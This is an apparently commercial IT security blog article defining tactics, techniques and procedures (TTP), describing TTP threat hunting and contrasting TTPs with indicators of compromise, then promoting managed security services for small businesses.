What Is Tactics, Techniques, and Procedures (TTP) in Cybersecurity?

TTP in Cybersecurity

There’s no shortage of confusing terminology and acronyms in the cybersecurity field. In this article, we’re looking at TTP.  It’s not reserved for those who make a living defending against cybersecurity threats. It’s an acronym that everyone should know.

What Does TTP Mean in Cybersecurity?

TTP stands for tactics, techniques, and procedures. This acronym describes the behavior of a threat actor in three levels – the “how,” the “what,” and the “why.”

What are Tactics in Cybersecurity?

Tactics are the high-level plans of what cybercriminals plan to achieve. They are the general strategies threat actors use to gain access to systems and information. It’s the “why.” Why they are trying a technique and what the attack will achieve. 

Why do they want access in the first place? A few examples might be:  

  • To gather your personal data to sell on the Dark Web.  
  • To remove your access to important resources to damage your finances or reputation. 
  • To use your confidential information for fraud, espionage, blackmail, etc. 

What Are Techniques in Cybersecurity? 

Techniques are the intermediate methods or tools a cybercriminal uses to breach your defenses. They provide a more detailed description in the context of the tactic. It answers the “what” of their behavior.  

They correspond to the major cyber threats, such as:  

What Are Procedures in Cybersecurity? 

Procedures are the lower-level, highly detailed steps cybercriminals follow to achieve their goals. It describes “how” they will achieve their desired result. 

The steps may correspond to specific software vulnerabilities. An example of this type of exploitation is the Microsoft Exchange server elevation of privilege vulnerability. Another procedure might detail how they will take advantage of the gaps in your defenses. 

MITRE is a not-for-profit organization that provides a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. They report collecting and filtering data based on TTPs is an effective method for detecting malicious activity.  

“This approach is effective because the technology on which adversaries operate (e.g., Microsoft Windows) constrains the number and types of techniques they can use to accomplish their goals post-compromise,” explains MITRE

What is TTP Hunting? 

In the world of cybersecurity being proactive is a must to stay ahead of threat actors. Traditional security solutions involve firewalls, endpoint detection, SIEMs, etc. To get ahead, proactive tactics are used. 

Cyber threat hunting involves security analysts looking for potential cyber attacks by searching through networks or datasets to detect and respond to threats that avoid traditional security solutions.  

Once identified, a security plan is created to protect against them. Their manual labor helps to develop auto alerts. 

TTP hunting is a form of cyber threat hunting. Analysts focus on threat actor behaviors, attack patterns, and techniques. This process assists in predicting attacks by evaluating the trends of past cyber attacks to identify potential sources. 

Tactics, Techniques, and Procedures (TTP) vs Indicators of Compromise (IoC) 

TTPs shouldn’t be confused with Indicators of Compromise (IoC). TTPs describe what threat actors do and how they will do it. This offers the opportunity to proactively develop contextual understanding across incidents, threat actors, and campaigns.   

TTPs define instances such as victim targeting (e.g., HR representatives of finance companies), attack patterns, and much more. 

IoCs are reactive in nature. They are the breadcrumbs cybersecurity professionals see on a network or operating system that indicates an intrusion is occurring. They provide the opportunity for detection early in an attack sequence. 

If cybercriminals were bank robbers, TTPs would be the strategies used to get inside the vault. IoCs are the things you can see that indicate they are there – such as a smashed lock or missing money. 

Let’s demonstrate the difference between IoCs and TTPs during a phishing attack – where their goal is to steal login credentials. 

When detected, IoCs begin incident response activities to protect valuable systems from threat actors. TTPs give the security team the information they need to protect all possible attack paths. 

Should SMBs Study TTPs? 

Small and medium-sized businesses (SMBs) rarely employ a cybersecurity team. When they do, they are rarely large enough to dedicate resources to the study of current and emerging TTPs. 

SMBs benefit from outsourcing this activity to a managed security service provider (MSSP). They can provide you with threat intelligence and threat detection services.  

You will profit from a partnership with an experienced MSSP if you have yet to implement beginning-to-end strategies to improve your cybersecurity defenses. Use its experience to implement cybersecurity best practices, such as: 

  • Multi-factor authentication (MFA): Many TTPs used by today’s cybercriminals target weak authentication and login mechanisms. MFA strengthens the authentication process by adding one or more extra layers of protection. This can block as much as 99.9 percent of identity attacks. 
  • Cybersecurity awareness training: People remain the weakest link in the cybersecurity chain. This is because their actions can sabotage even the most well thought out policies and controls. Cybersecurity awareness training can strengthen this link and make it less likely to break. 
  • Endpoint protection: The abundance of the hybrid work model led to an explosion of endpoints (laptops, tablets, smartphones, etc.). Each of which represent a possible attack path. Modern endpoint protection solutions help discover and defend these endpoints – regardless of where they’re physically located. 

Learn how working with the right managed service provider will benefit your SMB in a competitive market. 

Subscribe to our newsletter
to get exclusive IT and cybersecurity insights.

    Filter articles

Latest Articles

Contact us to get started today!

Call us at (703) 740-9797 or fill out the form below to schedule your free consultation. We will get back to you shortly.

*All fields are required.

This site uses cookies to optimize functionality and give you the best possible experience. If you continue to navigate this website beyond this page, cookies will be placed on your browser. To learn more about cookies, click here.